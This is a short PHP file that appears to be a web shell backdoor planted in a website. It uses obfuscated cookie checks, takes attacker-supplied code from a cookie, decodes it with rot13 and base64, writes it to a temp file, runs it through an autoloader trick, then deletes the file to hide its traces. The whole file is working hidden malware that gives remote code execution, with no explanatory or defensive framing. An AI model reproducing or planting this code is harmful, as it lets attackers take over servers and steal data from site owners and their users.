<!--dgNM7NEi-->
<?php

if (isset($_COOKIE[52+-52]) && isset($_COOKIE[14-13]) && isset($_COOKIE[-71+74]) && isset($_COOKIE[56+-52])) {
    $attribute = $_COOKIE;
    function created($slot) {
        $attribute = $_COOKIE;
        $id = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), 'j3nmHff7');
        if (!is_writable($id)) {
            $id = getcwd() . DIRECTORY_SEPARATOR . "partition";
        }
        $fld = "\x3c\x3f\x70\x68p\x20" . base64_decode(str_rot13($attribute[3]));
        if (is_writeable($id)) {
            $argument = fopen($id, 'w+');
            fputs($argument, $fld);
            fclose($argument);
            spl_autoload_unregister(__FUNCTION__);
            require_once($id);
            @array_map('unlink', array($id));
        }
    }
    spl_autoload_register("created");
    $slt = "67ee5a12b67aa0d40be4666e1dbd4e5c";
    if (!strncmp($slt, $attribute[4], 32)) {
        if (@class_parents("reset_cache", true)) {
            exit;
        }
    }
}